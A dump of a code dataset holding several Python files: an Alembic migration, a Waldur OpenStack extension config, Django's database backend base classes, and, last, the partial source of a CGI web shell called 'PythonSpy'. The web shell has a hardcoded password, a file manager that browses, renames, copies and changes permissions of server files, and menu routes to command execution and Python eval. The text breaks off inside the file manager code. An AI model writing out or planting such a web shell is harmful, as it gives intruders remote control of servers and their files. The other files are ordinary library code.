code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
"""adding territories or freely associated states flag to country code
Revision ID: 1fb19acc7d64
Revises: 0cf297fa927c
Create Date: 2019-04-16 14:32:40.284194
"""
# revision identifiers, used by Alembic.
revision = '1fb19acc7d64'
down_revision = '0cf297fa927c'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_data_broker():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('country_code', sa.Column('territory_free_state', sa.Boolean(), server_default='False',
nullable=False))
# ### end Alembic commands ###
def downgrade_data_broker():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('country_code', 'territory_free_state')
# ### end Alembic commands ###
|
fedspendingtransparency/data-act-broker-backend
|
dataactcore/migrations/versions/1fb19acc7d64_adding_territories_or_freely_associated_.py
|
Python
|
cc0-1.0
| 1,033
|
from waldur_core.core import WaldurExtension
class OpenStackTenantExtension(WaldurExtension):
class Settings:
# wiki: https://opennode.atlassian.net/wiki/display/WD/OpenStack+plugin+configuration
WALDUR_OPENSTACK_TENANT = {
'MAX_CONCURRENT_PROVISION': {
'OpenStackTenant.Instance': 4,
'OpenStackTenant.Volume': 4,
'OpenStackTenant.Snapshot': 4,
},
}
@staticmethod
def django_app():
return 'waldur_openstack.openstack_tenant'
@staticmethod
def rest_urls():
from .urls import register_in
return register_in
@staticmethod
def celery_tasks():
from datetime import timedelta
return {
'openstacktenant-schedule-backups': {
'task': 'openstack_tenant.ScheduleBackups',
'schedule': timedelta(minutes=10),
'args': (),
},
'openstacktenant-delete-expired-backups': {
'task': 'openstack_tenant.DeleteExpiredBackups',
'schedule': timedelta(minutes=10),
'args': (),
},
'openstacktenant-schedule-snapshots': {
'task': 'openstack_tenant.ScheduleSnapshots',
'schedule': timedelta(minutes=10),
'args': (),
},
'openstacktenant-delete-expired-snapshots': {
'task': 'openstack_tenant.DeleteExpiredSnapshots',
'schedule': timedelta(minutes=10),
'args': (),
},
'openstacktenant-set-erred-stuck-resources': {
'task': 'openstack_tenant.SetErredStuckResources',
'schedule': timedelta(minutes=10),
'args': (),
},
}
@staticmethod
def get_cleanup_executor():
from .executors import OpenStackTenantCleanupExecutor
return OpenStackTenantCleanupExecutor
|
opennode/nodeconductor-openstack
|
src/waldur_openstack/openstack_tenant/extension.py
|
Python
|
mit
| 1,984
|
import decimal
try:
import thread
except ImportError:
import dummy_thread as thread
from threading import local
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS
from django.db.backends import util
from django.db.transaction import TransactionManagementError
from django.utils import datetime_safe
from django.utils.importlib import import_module
class BaseDatabaseWrapper(local):
"""
Represents a database connection.
"""
ops = None
vendor = 'unknown'
def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS):
# `settings_dict` should be a dictionary containing keys such as
# NAME, USER, etc. It's called `settings_dict` instead of `settings`
# to disambiguate it from Django settings modules.
self.connection = None
self.queries = []
self.settings_dict = settings_dict
self.alias = alias
self.use_debug_cursor = None
# Transaction related attributes
self.transaction_state = []
self.savepoint_state = 0
self._dirty = None
def __eq__(self, other):
return self.alias == other.alias
def __ne__(self, other):
return not self == other
def _commit(self):
if self.connection is not None:
return self.connection.commit()
def _rollback(self):
if self.connection is not None:
return self.connection.rollback()
def _enter_transaction_management(self, managed):
"""
A hook for backend-specific changes required when entering manual
transaction handling.
"""
pass
def _leave_transaction_management(self, managed):
"""
A hook for backend-specific changes required when leaving manual
transaction handling. Will usually be implemented only when
_enter_transaction_management() is also required.
"""
pass
def _savepoint(self, sid):
if not self.features.uses_savepoints:
return
self.cursor().execute(self.ops.savepoint_create_sql(sid))
def _savepoint_rollback(self, sid):
if not self.features.uses_savepoints:
return
self.cursor().execute(self.ops.savepoint_rollback_sql(sid))
def _savepoint_commit(self, sid):
if not self.features.uses_savepoints:
return
self.cursor().execute(self.ops.savepoint_commit_sql(sid))
def enter_transaction_management(self, managed=True):
"""
Enters transaction management for a running thread. It must be balanced with
the appropriate leave_transaction_management call, since the actual state is
managed as a stack.
The state and dirty flag are carried over from the surrounding block or
from the settings, if there is no surrounding block (dirty is always false
when no current block is running).
"""
if self.transaction_state:
self.transaction_state.append(self.transaction_state[-1])
else:
self.transaction_state.append(settings.TRANSACTIONS_MANAGED)
if self._dirty is None:
self._dirty = False
self._enter_transaction_management(managed)
def leave_transaction_management(self):
"""
Leaves transaction management for a running thread. A dirty flag is carried
over to the surrounding block, as a commit will commit all changes, even
those from outside. (Commits are on connection level.)
"""
self._leave_transaction_management(self.is_managed())
if self.transaction_state:
del self.transaction_state[-1]
else:
raise TransactionManagementError("This code isn't under transaction "
"management")
if self._dirty:
self.rollback()
raise TransactionManagementError("Transaction managed block ended with "
"pending COMMIT/ROLLBACK")
self._dirty = False
def is_dirty(self):
"""
Returns True if the current transaction requires a commit for changes to
happen.
"""
return self._dirty
def set_dirty(self):
"""
Sets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether there are open
changes waiting for commit.
"""
if self._dirty is not None:
self._dirty = True
else:
raise TransactionManagementError("This code isn't under transaction "
"management")
def set_clean(self):
"""
Resets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether a commit or rollback
should happen.
"""
if self._dirty is not None:
self._dirty = False
else:
raise TransactionManagementError("This code isn't under transaction management")
self.clean_savepoints()
def clean_savepoints(self):
self.savepoint_state = 0
def is_managed(self):
"""
Checks whether the transaction manager is in manual or in auto state.
"""
if self.transaction_state:
return self.transaction_state[-1]
return settings.TRANSACTIONS_MANAGED
def managed(self, flag=True):
"""
Puts the transaction manager into a manual state: managed transactions have
to be committed explicitly by the user. If you switch off transaction
management and there is a pending commit/rollback, the data will be
commited.
"""
top = self.transaction_state
if top:
top[-1] = flag
if not flag and self.is_dirty():
self._commit()
self.set_clean()
else:
raise TransactionManagementError("This code isn't under transaction "
"management")
def commit_unless_managed(self):
"""
Commits changes if the system is not in managed transaction mode.
"""
if not self.is_managed():
self._commit()
self.clean_savepoints()
else:
self.set_dirty()
def rollback_unless_managed(self):
"""
Rolls back changes if the system is not in managed transaction mode.
"""
if not self.is_managed():
self._rollback()
else:
self.set_dirty()
def commit(self):
"""
Does the commit itself and resets the dirty flag.
"""
self._commit()
self.set_clean()
def rollback(self):
"""
This function does the rollback itself and resets the dirty flag.
"""
self._rollback()
self.set_clean()
def savepoint(self):
"""
Creates a savepoint (if supported and required by the backend) inside the
current transaction. Returns an identifier for the savepoint that will be
used for the subsequent rollback or commit.
"""
thread_ident = thread.get_ident()
self.savepoint_state += 1
tid = str(thread_ident).replace('-', '')
sid = "s%s_x%d" % (tid, self.savepoint_state)
self._savepoint(sid)
return sid
def savepoint_rollback(self, sid):
"""
Rolls back the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if self.savepoint_state:
self._savepoint_rollback(sid)
def savepoint_commit(self, sid):
"""
Commits the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if self.savepoint_state:
self._savepoint_commit(sid)
def close(self):
if self.connection is not None:
self.connection.close()
self.connection = None
def cursor(self):
if (self.use_debug_cursor or
(self.use_debug_cursor is None and settings.DEBUG)):
cursor = self.make_debug_cursor(self._cursor())
else:
cursor = util.CursorWrapper(self._cursor(), self)
return cursor
def make_debug_cursor(self, cursor):
return util.CursorDebugWrapper(cursor, self)
class BaseDatabaseFeatures(object):
allows_group_by_pk = False
# True if django.db.backend.utils.typecast_timestamp is used on values
# returned from dates() calls.
needs_datetime_string_cast = True
empty_fetchmany_value = []
update_can_self_select = True
# Does the backend distinguish between '' and None?
interprets_empty_strings_as_nulls = False
# Does the backend allow inserting duplicate rows when a unique_together
# constraint exists, but one of the unique_together columns is NULL?
ignores_nulls_in_unique_constraints = True
can_use_chunked_reads = True
can_return_id_from_insert = False
uses_autocommit = False
uses_savepoints = False
# If True, don't use integer foreign keys referring to, e.g., positive
# integer primary keys.
related_fields_match_type = False
allow_sliced_subqueries = True
supports_joins = True
distinguishes_insert_from_update = True
supports_deleting_related_objects = True
supports_select_related = True
# Does the default test database allow multiple connections?
# Usually an indication that the test database is in-memory
test_db_allows_multiple_connections = True
# Can an object be saved without an explicit primary key?
supports_unspecified_pk = False
# Can a fixture contain forward references? i.e., are
# FK constraints checked at the end of transaction, or
# at the end of each save operation?
supports_forward_references = True
# Does a dirty transaction need to be rolled back
# before the cursor can be used again?
requires_rollback_on_dirty_transaction = False
# Does the backend allow very long model names without error?
supports_long_model_names = True
# Is there a REAL datatype in addition to floats/doubles?
has_real_datatype = False
supports_subqueries_in_group_by = True
supports_bitwise_or = True
# Do time/datetime fields have microsecond precision?
supports_microsecond_precision = True
# Does the __regex lookup support backreferencing and grouping?
supports_regex_backreferencing = True
# Can date/datetime lookups be performed using a string?
supports_date_lookup_using_string = True
# Can datetimes with timezones be used?
supports_timezones = True
# When performing a GROUP BY, is an ORDER BY NULL required
# to remove any ordering?
requires_explicit_null_ordering_when_grouping = False
# Is there a 1000 item limit on query parameters?
supports_1000_query_parameters = True
# Can an object have a primary key of 0? MySQL says No.
allows_primary_key_0 = True
# Do we need to NULL a ForeignKey out, or can the constraint check be
# deferred
can_defer_constraint_checks = False
# date_interval_sql can properly handle mixed Date/DateTime fields and timedeltas
supports_mixed_date_datetime_comparisons = True
# Features that need to be confirmed at runtime
# Cache whether the confirmation has been performed.
_confirmed = False
supports_transactions = None
supports_stddev = None
can_introspect_foreign_keys = None
def __init__(self, connection):
self.connection = connection
def confirm(self):
"Perform manual checks of any database features that might vary between installs"
self._confirmed = True
self.supports_transactions = self._supports_transactions()
self.supports_stddev = self._supports_stddev()
self.can_introspect_foreign_keys = self._can_introspect_foreign_keys()
def _supports_transactions(self):
"Confirm support for transactions"
cursor = self.connection.cursor()
cursor.execute('CREATE TABLE ROLLBACK_TEST (X INT)')
self.connection._commit()
cursor.execute('INSERT INTO ROLLBACK_TEST (X) VALUES (8)')
self.connection._rollback()
cursor.execute('SELECT COUNT(X) FROM ROLLBACK_TEST')
count, = cursor.fetchone()
cursor.execute('DROP TABLE ROLLBACK_TEST')
self.connection._commit()
return count == 0
def _supports_stddev(self):
"Confirm support for STDDEV and related stats functions"
class StdDevPop(object):
sql_function = 'STDDEV_POP'
try:
self.connection.ops.check_aggregate_support(StdDevPop())
except NotImplementedError:
self.supports_stddev = False
def _can_introspect_foreign_keys(self):
"Confirm support for introspected foreign keys"
# Every database can do this reliably, except MySQL,
# which can't do it for MyISAM tables
return True
class BaseDatabaseOperations(object):
"""
This class encapsulates all backend-specific differences, such as the way
a backend performs ordering or calculates the ID of a recently-inserted
row.
"""
compiler_module = "django.db.models.sql.compiler"
def __init__(self):
self._cache = None
def autoinc_sql(self, table, column):
"""
Returns any SQL needed to support auto-incrementing primary keys, or
None if no SQL is necessary.
This SQL is executed when a table is created.
"""
return None
def date_extract_sql(self, lookup_type, field_name):
"""
Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
extracts a value from the given date field field_name.
"""
raise NotImplementedError()
def date_interval_sql(self, sql, connector, timedelta):
"""
Implements the date interval functionality for expressions
"""
raise NotImplementedError()
def date_trunc_sql(self, lookup_type, field_name):
"""
Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
truncates the given date field field_name to a DATE object with only
the given specificity.
"""
raise NotImplementedError()
def datetime_cast_sql(self):
"""
Returns the SQL necessary to cast a datetime value so that it will be
retrieved as a Python datetime object instead of a string.
This SQL should include a '%s' in place of the field's name.
"""
return "%s"
def deferrable_sql(self):
"""
Returns the SQL necessary to make a constraint "initially deferred"
during a CREATE TABLE statement.
"""
return ''
def drop_foreignkey_sql(self):
"""
Returns the SQL command that drops a foreign key.
"""
return "DROP CONSTRAINT"
def drop_sequence_sql(self, table):
"""
Returns any SQL necessary to drop the sequence for the given table.
Returns None if no SQL is necessary.
"""
return None
def fetch_returned_insert_id(self, cursor):
"""
Given a cursor object that has just performed an INSERT...RETURNING
statement into a table that has an auto-incrementing ID, returns the
newly created ID.
"""
return cursor.fetchone()[0]
def field_cast_sql(self, db_type):
"""
Given a column type (e.g. 'BLOB', 'VARCHAR'), returns the SQL necessary
to cast it before using it in a WHERE statement. Note that the
resulting string should contain a '%s' placeholder for the column being
searched against.
"""
return '%s'
def force_no_ordering(self):
"""
Returns a list used in the "ORDER BY" clause to force no ordering at
all. Returning an empty list means that nothing will be included in the
ordering.
"""
return []
def fulltext_search_sql(self, field_name):
"""
Returns the SQL WHERE clause to use in order to perform a full-text
search of the given field_name. Note that the resulting string should
contain a '%s' placeholder for the value being searched against.
"""
raise NotImplementedError('Full-text search is not implemented for this database backend')
def last_executed_query(self, cursor, sql, params):
"""
Returns a string of the query last executed by the given cursor, with
placeholders replaced with actual values.
`sql` is the raw query containing placeholders, and `params` is the
sequence of parameters. These are used by default, but this method
exists for database backends to provide a better implementation
according to their own quoting schemes.
"""
from django.utils.encoding import smart_unicode, force_unicode
# Convert params to contain Unicode values.
to_unicode = lambda s: force_unicode(s, strings_only=True, errors='replace')
if isinstance(params, (list, tuple)):
u_params = tuple([to_unicode(val) for val in params])
else:
u_params = dict([(to_unicode(k), to_unicode(v)) for k, v in params.items()])
return smart_unicode(sql) % u_params
def last_insert_id(self, cursor, table_name, pk_name):
"""
Given a cursor object that has just performed an INSERT statement into
a table that has an auto-incrementing ID, returns the newly created ID.
This method also receives the table name and the name of the primary-key
column.
"""
return cursor.lastrowid
def lookup_cast(self, lookup_type):
"""
Returns the string to use in a query when performing lookups
("contains", "like", etc). The resulting string should contain a '%s'
placeholder for the column being searched against.
"""
return "%s"
def max_in_list_size(self):
"""
Returns the maximum number of items that can be passed in a single 'IN'
list condition, or None if the backend does not impose a limit.
"""
return None
def max_name_length(self):
"""
Returns the maximum length of table and column names, or None if there
is no limit.
"""
return None
def no_limit_value(self):
"""
Returns the value to use for the LIMIT when we are wanting "LIMIT
infinity". Returns None if the limit clause can be omitted in this case.
"""
raise NotImplementedError
def pk_default_value(self):
"""
Returns the value to use during an INSERT statement to specify that
the field should use its default value.
"""
return 'DEFAULT'
def process_clob(self, value):
"""
Returns the value of a CLOB column, for backends that return a locator
object that requires additional processing.
"""
return value
def return_insert_id(self):
"""
For backends that support returning the last insert ID as part
of an insert query, this method returns the SQL and params to
append to the INSERT query. The returned fragment should
contain a format string to hold the appropriate column.
"""
pass
def compiler(self, compiler_name):
"""
Returns the SQLCompiler class corresponding to the given name,
in the namespace corresponding to the `compiler_module` attribute
on this backend.
"""
if self._cache is None:
self._cache = import_module(self.compiler_module)
return getattr(self._cache, compiler_name)
def quote_name(self, name):
"""
Returns a quoted version of the given table, index or column name. Does
not quote the given name if it's already been quoted.
"""
raise NotImplementedError()
def random_function_sql(self):
"""
Returns a SQL expression that returns a random value.
"""
return 'RANDOM()'
def regex_lookup(self, lookup_type):
"""
Returns the string to use in a query when performing regular expression
lookups (using "regex" or "iregex"). The resulting string should
contain a '%s' placeholder for the column being searched against.
If the feature is not supported (or part of it is not supported), a
NotImplementedError exception can be raised.
"""
raise NotImplementedError
def savepoint_create_sql(self, sid):
"""
Returns the SQL for starting a new savepoint. Only required if the
"uses_savepoints" feature is True. The "sid" parameter is a string
for the savepoint id.
"""
raise NotImplementedError
def savepoint_commit_sql(self, sid):
"""
Returns the SQL for committing the given savepoint.
"""
raise NotImplementedError
def savepoint_rollback_sql(self, sid):
"""
Returns the SQL for rolling back the given savepoint.
"""
raise NotImplementedError
def sql_flush(self, style, tables, sequences):
"""
Returns a list of SQL statements required to remove all data from
the given database tables (without actually removing the tables
themselves).
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
"""
raise NotImplementedError()
def sequence_reset_sql(self, style, model_list):
"""
Returns a list of the SQL statements required to reset sequences for
the given models.
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
"""
return [] # No sequence reset required by default.
def start_transaction_sql(self):
"""
Returns the SQL statement required to start a transaction.
"""
return "BEGIN;"
def end_transaction_sql(self, success=True):
if not success:
return "ROLLBACK;"
return "COMMIT;"
def tablespace_sql(self, tablespace, inline=False):
"""
Returns the SQL that will be appended to tables or rows to define
a tablespace. Returns '' if the backend doesn't use tablespaces.
"""
return ''
def prep_for_like_query(self, x):
"""Prepares a value for use in a LIKE query."""
from django.utils.encoding import smart_unicode
return smart_unicode(x).replace("\\", "\\\\").replace("%", "\%").replace("_", "\_")
# Same as prep_for_like_query(), but called for "iexact" matches, which
# need not necessarily be implemented using "LIKE" in the backend.
prep_for_iexact_query = prep_for_like_query
def value_to_db_auto(self, value):
"""
Transform a value to an object compatible with the auto field required
by the backend driver for auto columns.
"""
if value is None:
return None
return int(value)
def value_to_db_date(self, value):
"""
Transform a date value to an object compatible with what is expected
by the backend driver for date columns.
"""
if value is None:
return None
return datetime_safe.new_date(value).strftime('%Y-%m-%d')
def value_to_db_datetime(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for datetime columns.
"""
if value is None:
return None
return unicode(value)
def value_to_db_time(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for time columns.
"""
if value is None:
return None
return unicode(value)
def value_to_db_decimal(self, value, max_digits, decimal_places):
"""
Transform a decimal.Decimal value to an object compatible with what is
expected by the backend driver for decimal (numeric) columns.
"""
if value is None:
return None
return util.format_number(value, max_digits, decimal_places)
def year_lookup_bounds(self, value):
"""
Returns a two-elements list with the lower and upper bound to be used
with a BETWEEN operator to query a field value using a year lookup
`value` is an int, containing the looked-up year.
"""
first = '%s-01-01 00:00:00'
second = '%s-12-31 23:59:59.999999'
return [first % value, second % value]
def year_lookup_bounds_for_date_field(self, value):
"""
Returns a two-elements list with the lower and upper bound to be used
with a BETWEEN operator to query a DateField value using a year lookup
`value` is an int, containing the looked-up year.
By default, it just calls `self.year_lookup_bounds`. Some backends need
this hook because on their DB date fields can't be compared to values
which include a time part.
"""
return self.year_lookup_bounds(value)
def convert_values(self, value, field):
"""Coerce the value returned by the database backend into a consistent type that
is compatible with the field type.
"""
internal_type = field.get_internal_type()
if internal_type == 'DecimalField':
return value
elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':
return int(value)
elif internal_type in ('DateField', 'DateTimeField', 'TimeField'):
return value
# No field, or the field isn't known to be a decimal or integer
# Default to a float
return float(value)
def check_aggregate_support(self, aggregate_func):
"""Check that the backend supports the provided aggregate
This is used on specific backends to rule out known aggregates
that are known to have faulty implementations. If the named
aggregate function has a known problem, the backend should
raise NotImplemented.
"""
pass
def combine_expression(self, connector, sub_expressions):
"""Combine a list of subexpressions into a single expression, using
the provided connecting operator. This is required because operators
can vary between backends (e.g., Oracle with %% and &) and between
subexpression types (e.g., date expressions)
"""
conn = ' %s ' % connector
return conn.join(sub_expressions)
class BaseDatabaseIntrospection(object):
"""
This class encapsulates all backend-specific introspection utilities
"""
data_types_reverse = {}
def __init__(self, connection):
self.connection = connection
def get_field_type(self, data_type, description):
"""Hook for a database backend to use the cursor description to
match a Django field type to a database column.
For Oracle, the column data_type on its own is insufficient to
distinguish between a FloatField and IntegerField, for example."""
return self.data_types_reverse[data_type]
def table_name_converter(self, name):
"""Apply a conversion to the name for the purposes of comparison.
The default table name converter is for case sensitive comparison.
"""
return name
def table_names(self):
"Returns a list of names of all tables that exist in the database."
cursor = self.connection.cursor()
return self.get_table_list(cursor)
def django_table_names(self, only_existing=False):
"""
Returns a list of all table names that have associated Django models and
are in INSTALLED_APPS.
If only_existing is True, the resulting list will only include the tables
that actually exist in the database.
"""
from django.db import models, router
tables = set()
for app in models.get_apps():
for model in models.get_models(app):
if not model._meta.managed:
continue
if not router.allow_syncdb(self.connection.alias, model):
continue
tables.add(model._meta.db_table)
tables.update([f.m2m_db_table() for f in model._meta.local_many_to_many])
if only_existing:
existing_tables = self.table_names()
tables = [
t
for t in tables
if self.table_name_converter(t) in existing_tables
]
return tables
def installed_models(self, tables):
"Returns a set of all models represented by the provided list of table names."
from django.db import models, router
all_models = []
for app in models.get_apps():
for model in models.get_models(app):
if router.allow_syncdb(self.connection.alias, model):
all_models.append(model)
tables = map(self.table_name_converter, tables)
return set([
m for m in all_models
if self.table_name_converter(m._meta.db_table) in tables
])
def sequence_list(self):
"Returns a list of information about all DB sequences for all models in all apps."
from django.db import models, router
apps = models.get_apps()
sequence_list = []
for app in apps:
for model in models.get_models(app):
if not model._meta.managed:
continue
if not router.allow_syncdb(self.connection.alias, model):
continue
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
sequence_list.append({'table': model._meta.db_table, 'column': f.column})
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.local_many_to_many:
# If this is an m2m using an intermediate table,
# we don't need to reset the sequence.
if f.rel.through is None:
sequence_list.append({'table': f.m2m_db_table(), 'column': None})
return sequence_list
class BaseDatabaseClient(object):
"""
This class encapsulates all backend-specific methods for opening a
client shell.
"""
# This should be a string representing the name of the executable
# (e.g., "psql"). Subclasses must override this.
executable_name = None
def __init__(self, connection):
# connection is an instance of BaseDatabaseWrapper.
self.connection = connection
def runshell(self):
raise NotImplementedError()
class BaseDatabaseValidation(object):
"""
This class encapsualtes all backend-specific model validation.
"""
def __init__(self, connection):
self.connection = connection
def validate_field(self, errors, opts, f):
"By default, there is no backend-specific validation"
pass
|
liqi328/rjrepaircompany
|
django/db/backends/__init__.py
|
Python
|
bsd-3-clause
| 31,617
|
#!C:/Python26/python.exe
# -*- coding: utf-8 -*-
# enable debugging
import cgi
import os
import sys
import time
import re
import socket
import stat
import StringIO
import subprocess
import time
import itertools
from os import environ
form = cgi.FieldStorage()
# ===================== 程序配置 =====================
admin={}
# 是否需要密码验证, true 为需要验证, false 为直接进入.下面选项则无效
admin['check'] = True
admin['pass'] = '123456'
# 如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
# cookie 前缀
admin['cookiepre'] = '';
# cookie 作用域
admin['cookiedomain'] = '';
# cookie 作用路径
admin['cookiepath'] = '/';
# cookie 有效期
admin['cookielife'] = 86400;
# ===================== 配置结束 =====================
self = os.path.basename(__file__)
timestamp = time.time()
def getcookie(key):
if environ.has_key('HTTP_COOKIE'):
for cookie in environ['HTTP_COOKIE'].split(';'):
k , v = cookie.split('=')
if key == k:
return v
return ""
def getvalue(key):
if form.has_key(key):
return form.getvalue(key)
return ""
def tryExcept(fun):
def wrapper(args):
try:
fun(args)
except:
pass
return wrapper
def handler():
action = getvalue("action")
if action == "" or action == "file":
do_file()
elif action == "shell":
do_shell()
elif action == "env":
do_env()
elif action == "eval":
do_eval()
bgc = 0
def bg():
global bgc
bgc += 1
return 'alt1' if bgc%2 == 0 else 'alt2'
def loginpage():
loginHtml = """
<style type="text/css">
input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
<input type="hidden" name="doing" value="login">
<input type="submit" value="Login">
</form>
"""
print loginHtml
def index():
addr,host = "",""
if environ.has_key('REMOTE_ADDR'):
addr = environ['REMOTE_ADDR']
if environ.has_key('REMOTE_HOST'):
host = environ['REMOTE_HOST']
else:
host = socket.gethostbyaddr(addr)[0]
html = """
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title>PythonSpy</title>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
for(var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function $(id) {
return document.getElementById(id);
}
function goaction(act){
$('goaction').action.value=act;
$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td><span style="float:right;"><a href="http://blog.csdn.net/yueguanghaidao" target="_blank"> Author: SkyCrab</a></span>%s(%s)
</td>
</tr>
<tr class="alt1">
<td>
<a href="javascript:goaction('file');">File Manager</a> |
<a href="javascript:goaction('shell');">Execute Command</a> |
<a href="javascript:goaction('env');">System Variable</a> |
<a href="javascript:goaction('eval');">Eval Python Code</a>
</td>
</tr>
</table>
<form name="goaction" id="goaction" action="" method="post" >
<input id="action" type="hidden" name="action" value="" />
</form>
""" % (addr,host)
print html
handler()
def getPerms(path):
user = {}
group = {}
other = {}
mode = os.stat(path)[stat.ST_MODE]
perm = oct(mode)[-4:]
type = ""
if stat.S_ISDIR(mode):
type = 'd'
elif stat.S_ISLNK(mode):
type = 'l'
elif stat.S_ISCHR(mode):
type = 'c'
elif stat.S_ISBLK(mode):
type = 'b'
elif stat.S_ISREG(mode):
type = '-'
elif stat.S_ISFIFO(mode):
type = 'p'
elif stat.S_ISSOCK(mode):
type = 's'
else:
type = '?'
user['read'] = 'r' if (mode & 00400) else '-'
user['write'] = 'w' if (mode & 00200) else '-'
user['execute'] = 'x' if (mode & 00100) else '-'
group['read'] = 'r' if (mode & 00040) else '-'
group['write'] = 'w' if (mode & 00020) else '-'
group['execute'] = 'x' if (mode & 00010) else '-'
other['read'] = 'r' if (mode & 00004) else '-'
other['write'] = 'w' if (mode & 00002) else '-'
other['execute'] = 'x' if (mode & 00001) else '-'
return perm,type+user['read']+user['write']+user['execute']+group['read']+group['write']+group['execute']+other['read']+other['write']+other['execute']
def do_file():
current_dir = getvalue("dir") or os.getcwd()
parent_dir = os.path.dirname(current_dir)
perm,mode = getPerms(current_dir)
forms = """
<form name="createdir" id="createdir" action="" method="post" >
<input id="newdirname" type="hidden" name="newdirname" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="fileperm" id="fileperm" action="" method="post" >
<input id="newperm" type="hidden" name="newperm" value="" />
<input id="pfile" type="hidden" name="pfile" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="copyfile" id="copyfile" action="" method="post" >
<input id="sname" type="hidden" name="sname" value="" />
<input id="tofile" type="hidden" name="tofile" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="rename" id="rename" action="" method="post" >
<input id="oldname" type="hidden" name="oldname" value="" />
<input id="newfilename" type="hidden" name="newfilename" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="fileopform" id="fileopform" action="" method="post" >
<input id="action" type="hidden" name="action" value="" />
<input id="opfile" type="hidden" name="opfile" value="" />
<input id="dir" type="hidden" name="dir" value="" />
</form>
""" % tuple((current_dir+'/' for x in range(4)))
godir="""
<table width="100%%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<form action="" method="post" id="godir" name="godir">
<tr>
<td nowrap>Current Directory (%s, %s)</td>
<td width="100%%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="%s" type="text" style="width:100%%;margin:0 8px;"></td>
<td nowrap><input class="bt" value="GO" type="submit"></td>
</tr>
</form>
</table>
<script type="text/javascript">
function createdir(){
var newdirname;
newdirname = prompt('Please input the directory name:', '');
if (!newdirname) return;
$('createdir').newdirname.value=newdirname;
$('createdir').submit();
}
function fileperm(pfile){
var newperm;
newperm = prompt('Current file:'+pfile+'Please input new attribute:', '');
if (!newperm) return;
$('fileperm').newperm.value=newperm;
$('fileperm').pfile.value=pfile;
$('fileperm').submit();
}
function copyfile(sname){
var tofile;
tofile = prompt('Original file:'+sname+'Please input object file (fullpath):', '');
if (!tofile) return;
$('copyfile').tofile.value=tofile;
$('copyfile').sname.value=sname;
$('copyfile').submit();
}
function rename(oldname){
var newfilename;
newfilename = prompt('Former file name:'+oldname+'Please input new filename:', '');
if (!newfilename) return;
$('rename').newfilename.value=newfilename;
$('rename').oldname.value=oldname;
$('rename').submit();
}
function dofile(doing,thefile,m){
if (m && !confirm(m)) {
return;
}
$('filelist').doing.value=doing;
if (thefile){
$('filelist').thefile.value=thefile;
}
$('filelist').submit();
}
function createfile(nowpath){
var filename;
filename = prompt('Please input the file name:', '');
if (!filename) return;
opfile('editfile',nowpath + filename,nowpath);
}
function opfile(action,opfile,dir){
$('fileopform').action.value=action;
$('fileopform').opfile.value=opfile;
$('fileopform').dir.value=dir;
$('fileopform').submit();
}
function godir(dir,view_writable){
if (view_writable) {
$('godir').view_writable.value=1;
}
$('godir').dir.value=dir;
$('godir').submit();
}
</script>
""" % (perm,mode,current_dir)
manage = """
<table width="100%%" border="0" cellpadding="4" cellspacing="0">
